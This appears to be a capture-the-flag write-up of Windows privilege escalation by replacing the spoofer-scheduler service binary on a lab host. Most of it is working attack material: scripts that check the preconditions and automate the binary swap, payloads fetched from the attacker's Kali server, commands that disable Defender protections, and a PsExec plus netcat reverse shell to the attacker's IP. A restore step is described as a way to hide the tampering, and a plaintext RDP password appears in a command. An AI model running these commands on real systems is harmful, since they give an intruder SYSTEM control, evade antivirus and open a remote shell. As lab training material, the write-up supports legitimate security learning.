Service Hijacking
It was identified that the current user, tyler, can modify the service binary of the spoofer-scheduler service and can stop and start that service on the HACKSMARTERSEC (10.10.183.209) host. Since spoofer-scheduler runs as SYSTEM, privilege escalation is achievable by replacing the service binary with a payload and restarting the service.
The HACKSMARTERSEC (10.10.183.209) host has AV enabled and enforced.
Executing a known-malicious PE file gets it flagged and removed by AV, so an off-the-shelf payload does not survive on disk.
Thus, the following payloads were built and tested, each dropped into the same service binary path:
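Before dropping anything, the two preconditions stated above (the binary is writable, the service can be stopped and started by us) are worth confirming from the low-privileged shell. The script below is an added example and not part of the original writeup; the service name is the one from this page, the helper functions and the simplifications noted in the comments are my own.

```powershell
# Added example, not part of the original writeup: confirm both preconditions for
# hijacking the spoofer-scheduler service binary as the current (low-privileged) user.
$svcName = 'spoofer-scheduler'

# --- Precondition 1: the service binary (or its directory) is writable by us ----
$svc = Get-CimInstance -ClassName Win32_Service -Filter "Name='$svcName'"
if (-not $svc) { throw "service $svcName not found" }
"{0} runs as '{1}', state {2}, from: {3}" -f $svc.Name, $svc.StartName, $svc.State, $svc.PathName

# Reduce ImagePath to the bare executable (quoted path, or unquoted path with arguments)
if ($svc.PathName -match '^"([^"]+)"') { $exe = $Matches[1] }
else { $exe = ($svc.PathName -split '(?<=\.exe)', 2)[0] }

# SIDs of the current user and of every group in the current token
$id   = [System.Security.Principal.WindowsIdentity]::GetCurrent()
$sids = @($id.User.Value) + @($id.Groups | ForEach-Object { $_.Value })

function Get-MyAllowedRights([string]$Path) {
    # Union of the Allow ACEs that name one of our SIDs. Simplified on purpose:
    # Deny ACEs and inherit-only entries are ignored, so treat the result as a hint.
    $mask = 0
    foreach ($ace in (Get-Acl -LiteralPath $Path).Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        try { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value }
        catch { continue }   # unresolvable account, skip it
        if ($sids -contains $sid) { $mask = $mask -bor [int]$ace.FileSystemRights }
    }
    return $mask
}

function Test-Right([int]$Have, [System.Security.AccessControl.FileSystemRights]$Want) {
    return (($Have -band [int]$Want) -eq [int]$Want)
}

$dir        = Split-Path -Parent $exe
$fileRights = Get-MyAllowedRights $exe
$dirRights  = Get-MyAllowedRights $dir
"file rights: {0}" -f ([System.Security.AccessControl.FileSystemRights]$fileRights)
"dir  rights: {0}" -f ([System.Security.AccessControl.FileSystemRights]$dirRights)

# Overwriting in place needs Write on the file. The rename trick used in this writeup
# (mv to .bak, then drop a new file) needs Delete on the file (or DeleteSubdirectoriesAndFiles
# on the directory) plus CreateFiles on the directory.
$canOverwrite = Test-Right $fileRights 'Write'
$canRename    = ((Test-Right $fileRights 'Delete') -or (Test-Right $dirRights 'DeleteSubdirectoriesAndFiles')) -and
                (Test-Right $dirRights 'CreateFiles')
"can overwrite binary: $canOverwrite ; can rename and replace: $canRename"

# --- Precondition 2: we hold SERVICE_START and SERVICE_STOP on the service ------
# sc.exe sdshow prints the service DACL as SDDL. In service SDDL, RP = SERVICE_START (0x10),
# WP = SERVICE_STOP (0x20) and DC = SERVICE_CHANGE_CONFIG (0x02).
$SERVICE_CHANGE_CONFIG = 0x0002; $SERVICE_START = 0x0010; $SERVICE_STOP = 0x0020
$sddl = (sc.exe sdshow $svcName | Where-Object { $_ -match '^\s*D:' }) -replace '^\s+', ''
$sd   = New-Object System.Security.AccessControl.RawSecurityDescriptor -ArgumentList $sddl
foreach ($ace in $sd.DiscretionaryAcl) {
    if ($ace.AceType -ne 'AccessAllowed' -or $sids -notcontains $ace.SecurityIdentifier.Value) { continue }
    $m = $ace.AccessMask
    try   { $who = $ace.SecurityIdentifier.Translate([System.Security.Principal.NTAccount]).Value }
    catch { $who = $ace.SecurityIdentifier.Value }
    "{0,-40} start={1} stop={2} change-config={3}" -f $who,
        (($m -band $SERVICE_START) -ne 0), (($m -band $SERVICE_STOP) -ne 0), (($m -band $SERVICE_CHANGE_CONFIG) -ne 0)
}
```

If no ACE in the second listing grants both start and stop, the binary can still be swapped but the payload only fires at the next reboot or when someone else restarts the service; SERVICE_CHANGE_CONFIG, where present, is a separate and easier path (changing the ImagePath) that this writeup does not need.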
MASM
PS C:\> mv "C:\Program Files (x86)\Spoofer\spoofer-scheduler.exe" "C:\Program Files (x86)\Spoofer\spoofer-scheduler.exe.bak"
PS C:\> curl http://10.9.0.130/spoofer-scheduler.exe -OutFile "C:\Program Files (x86)\Spoofer\spoofer-scheduler.exe"
Hijacking the service binary with the payload (curl here is the Windows PowerShell alias for Invoke-WebRequest).
PS C:\tmp> sc.exe stop spoofer-scheduler ; sc.exe start spoofer-scheduler
[SC] StartService FAILED 1053:
The service did not respond to the start or control request in a timely fashion.
Restarting the spoofer-scheduler service. Error 1053 is expected here: the payload is a plain executable that never registers with the Service Control Manager, so the SCM gives up after its start timeout (30 seconds by default) and terminates the process. By then the payload has already run as SYSTEM, which is all that is needed.
PS C:\tmp> net user adm1n
User name adm1n
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 7/5/2025 5:31:10 PM
Password expires 8/16/2025 5:31:10 PM
Password changeable 7/5/2025 5:31:10 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed All
Local Group Memberships *Administrators *Users
Global Group memberships *None
The command completed successfully.
The payload executed as SYSTEM and created a local administrator user, adm1n.
┌──(kali㉿kali)-[~/archive/thm/hacksmartersecurity]
└─$ xfreerdp /u:adm1n /p:'Qwer1234' /v:$IP /cert:ignore /dynamic-resolution /tls-seclevel:0
System level compromise.
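The same hijack cycle is repeated for every payload in this section: back up the real binary, drop the payload in its place, bounce the service, verify the effect, and put the original back. The script below is an added example, not code from the original writeup; the service name, paths and the Kali web server are the ones used on this page, the adm1n check mirrors what the MASM payload does, and the helper functions are my own.

```powershell
# Added example, not part of the original writeup: the full hijack cycle with the SCM
# start timeout made explicit and the original binary restored afterwards.
$svcName = 'spoofer-scheduler'
$exe     = 'C:\Program Files (x86)\Spoofer\spoofer-scheduler.exe'
$backup  = "$exe.bak"
$payload = 'http://10.9.0.130/spoofer-scheduler.exe'   # must already be AV-clean (see above)

function Get-ServiceState([string]$Name) {
    # sc.exe query prints a line such as "STATE : 4 RUNNING"; return the state word
    $out = (sc.exe query $Name) -join "`n"
    if ($out -match 'STATE\s*:\s*\d+\s+(\w+)') { return $Matches[1] }
    return 'UNKNOWN'
}

function Wait-ServiceState([string]$Name, [string]$Desired, [int]$Seconds = 30) {
    $deadline = (Get-Date).AddSeconds($Seconds)
    do {
        if ((Get-ServiceState $Name) -eq $Desired) { return $true }
        Start-Sleep -Milliseconds 500
    } while ((Get-Date) -lt $deadline)
    return $false
}

# 1. Back up the real binary once, then put the payload in its place
if (-not (Test-Path -LiteralPath $backup)) { Move-Item -LiteralPath $exe -Destination $backup }
Invoke-WebRequest -Uri $payload -OutFile $exe -UseBasicParsing

# 2. Stop, wait for STOPPED (a start issued during STOP_PENDING just fails), then start
sc.exe stop $svcName | Out-Null
if (-not (Wait-ServiceState $svcName 'STOPPED')) { Write-Warning 'service did not stop cleanly' }
$startOutput = sc.exe start $svcName
$startOutput

# A payload that never calls StartServiceCtrlDispatcher makes `sc start` fail with 1053 and
# the SCM kills the process after ServicesPipeTimeout (30 s by default). The payload still ran
# as SYSTEM for that window: enough for `net user /add`, or to spawn a detached child that
# outlives it. A payload that does register (START_PENDING plus a PID) keeps running.
if ($startOutput -match 'FAILED 1053') {
    'start timed out (1053): payload is not a real service binary; it ran, then got killed'
}

# 3. Verify the effect (here: the local admin that the MASM payload creates)
Start-Sleep -Seconds 5
$admins = (net localgroup Administrators) -join "`n"
if ($admins -match '(?m)^adm1n\s*$') { 'adm1n is a local Administrator: success' }
else { 'no adm1n yet: check the payload or the AV log' }

# 4. Put the original binary back so the service keeps working and the swap is less obvious.
#    Fails if a still-running payload holds the file open; stop it first in that case.
sc.exe stop $svcName | Out-Null
Wait-ServiceState $svcName 'STOPPED' | Out-Null
Move-Item -LiteralPath $backup -Destination $exe -Force
sc.exe start $svcName | Out-Null
"restored; service state is now $(Get-ServiceState $svcName)"
```

Step 4 is what separates a clean engagement from a broken host: the original spoofer-scheduler.exe.bak is the only copy of the legitimate service, so it is moved back rather than copied, and the service is started again so nobody notices a dead service.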
Nim-Reverse-Shell
PS C:\> mv "C:\Program Files (x86)\Spoofer\spoofer-scheduler.exe" "C:\Program Files (x86)\Spoofer\spoofer-scheduler.exe.bak"
PS C:\> curl http://10.9.0.130/Nim-Reverse-Shell/spoofer-scheduler.exe -OutFile "C:\Program Files (x86)\Spoofer\spoofer-scheduler.exe"
Hijacking the service binary with the payload.
PS C:\tmp> sc.exe stop spoofer-scheduler ; sc.exe start spoofer-scheduler
Restarting the spoofer-scheduler service.
System level compromise.
C
PS C:\> mv "C:\Program Files (x86)\Spoofer\spoofer-scheduler.exe" "C:\Program Files (x86)\Spoofer\spoofer-scheduler.exe.bak"
PS C:\> curl http://10.9.0.130/spoofer-scheduler.exe -OutFile "C:\Program Files (x86)\Spoofer\spoofer-scheduler.exe"
Hijacking the service binary with the payload.
PS C:\> sc.exe stop spoofer-scheduler ; sc.exe start spoofer-scheduler
SERVICE_NAME: spoofer-scheduler
TYPE : 10 WIN32_OWN_PROCESS
STATE : 3 STOP_PENDING
(STOPPABLE, PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x2
WAIT_HINT : 0x0
[SC] StartService FAILED 1053:
The service did not respond to the start or control request in a timely fashion.
Restarting the spoofer-scheduler service.
PS C:\> net localgroup Administrators
Alias name Administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
tyler
The command completed successfully.
The current user, tyler, is now a member of the Administrators group. Group membership is only reflected in tokens created after the change, so the elevated commands that follow need a fresh logon (and, for an interactive session under UAC, an elevated prompt).
PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true ; Set-MpPreference -DisableIOAVProtection $true ; Set-MpPreference -DisableScriptScanning 1
Disabling Defender real-time monitoring, IOAV protection and script scanning. This needs local admin rights and is silently ignored while Tamper Protection is enabled.
PS C:\> curl http://10.9.0.130/nc64.exe -OutFile C:\tmp\nc64.exe
PS C:\> curl http://10.9.0.130/PsExec64.exe -OutFile C:\tmp\PsExec64.exe
PS C:\> C:\tmp\PsExec64.exe -accepteula -i -s cmd.exe /c "C:\tmp\nc64.exe 10.9.0.130 1234 -e cmd"
PsExec v2.43 - Execute processes remotely
Copyright (C) 2001-2023 Mark Russinovich
Sysinternals - www.sysinternals.com
Sending a reverse shell as SYSTEM via PsExec64.exe (-s runs the command in the SYSTEM account, -i attaches it to the interactive desktop).
System level compromise.
update_script
PS C:\> mv "C:\Program Files (x86)\Spoofer\spoofer-scheduler.exe" "C:\Program Files (x86)\Spoofer\spoofer-scheduler.exe.bak"
PS C:\> curl http://10.9.0.130/update_script/spoofer-scheduler.exe -OutFile "C:\Program Files (x86)\Spoofer\spoofer-scheduler.exe"
Hijacking the service binary with the payload.
PS C:\> sc.exe stop spoofer-scheduler ; sc.exe start spoofer-scheduler
SERVICE_NAME: spoofer-scheduler
TYPE : 10 WIN32_OWN_PROCESS
STATE : 3 STOP_PENDING
(STOPPABLE, PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x2
WAIT_HINT : 0x0
[SC] StartService FAILED 1053:
The service did not respond to the start or control request in a timely fashion.
Restarting the spoofer-scheduler service. Again the 1053 timeout is expected; the payload has already run as SYSTEM by then.
Stager fetched.
System level compromise.
reverse_ssh
Simply the best one yet, although overkill.
PS C:\> mv "C:\Program Files (x86)\Spoofer\spoofer-scheduler.exe" "C:\Program Files (x86)\Spoofer\spoofer-scheduler.exe.bak"
PS C:\> curl http://10.9.0.130:3232/f34c0affc1580f49c4fc6f5c6217096d -OutFile "C:\Program Files (x86)\Spoofer\spoofer-scheduler.exe"
Hijacking the service binary with the payload, fetched from the RSSH server on Kali.
PS C:\> sc.exe stop spoofer-scheduler ; sc.exe start spoofer-scheduler
SERVICE_NAME: spoofer-scheduler
TYPE : 10 WIN32_OWN_PROCESS
STATE : 3 STOP_PENDING
(STOPPABLE, PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x2
WAIT_HINT : 0x0
SERVICE_NAME: spoofer-scheduler
TYPE : 10 WIN32_OWN_PROCESS
STATE : 2 START_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x7d0
PID : 2668
FLAGS :
Restarting the spoofer-scheduler service. Unlike the previous payloads, the start succeeds (START_PENDING with a PID) instead of timing out with 1053: the reverse_ssh client talks to the SCM like a real service, so it is not killed after the start timeout and the session stays up.
Inbound SSH connection to the RSSH server on Kali.
catcher$ ls -t
Targets
+------------------------------------------+--------+--------------------------------------+
| IDs | Owners | Version |
+------------------------------------------+--------+--------------------------------------+
| b805d060a335eac6249674b8c75e98195764f25b | public | SSH-v2.6.18-2-gd042bc4-windows_amd64 |
| da97814cf2d2bc531f198600080929ed2ef6909a | | |
| workgroup.hacksmartersec..hacksmartersec | | |
| 10.10.90.93:49751 | | |
+------------------------------------------+--------+--------------------------------------+
The RSSH server on Kali now shows an agent. Those IDs are all aliases for a single agent.
┌──(kali㉿kali)-[~]
└─$ ssh -J localhost:3232 workgroup.hacksmartersec..hacksmartersec
Enter passphrase for key '/home/kali/.ssh/id_ed25519':
The authenticity of host 'workgroup.hacksmartersec..hacksmartersec (<no hostip for proxy command>)' can't be established.
ED25519 key fingerprint is SHA256:NRut4OK6SEMyAuOYUuzTIs0c0Hvrq1ooAXb0sbLlAFY.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:291: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'workgroup.hacksmartersec..hacksmartersec' (ED25519) to the list of known hosts.
Enter passphrase for key '/home/kali/.ssh/id_ed25519':
Connecting through the RSSH server as a jump host.
catcher$ connect workgroup.hacksmartersec..hacksmartersec
Or like this, from the catcher console.
System level compromise.